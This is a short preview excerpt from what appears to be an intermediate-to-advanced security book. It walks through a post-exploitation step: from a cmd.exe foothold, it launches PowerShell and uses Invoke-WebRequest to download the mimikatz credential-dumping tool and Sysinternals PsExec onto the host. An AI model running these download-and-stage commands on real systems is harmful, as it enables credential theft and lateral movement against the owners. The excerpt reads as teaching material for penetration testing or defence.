January 2018
Intermediate to advanced
384 pages
10h 6m
English
At this point you have access to cmd.exe, and from there you can launch PowerShell using the command start powershell -NoExit. The reason you want to launch PowerShell is because you want to download mimikatz from GitHub.
To do that, run the following command:
Invoke-WebRequest -Uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20170813/mimikatz_trunk.zip" -OutFile "C:tempmimikatz_trunk.zip"
Also, make sure to download the PsExec tool from Sysinternals, since you will need it later. To do that, use the following command from the same PowerShell console:
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:tempPSTools.zip"
In the PowerShell console, use the command expand-archive ...
Read now
Unlock full access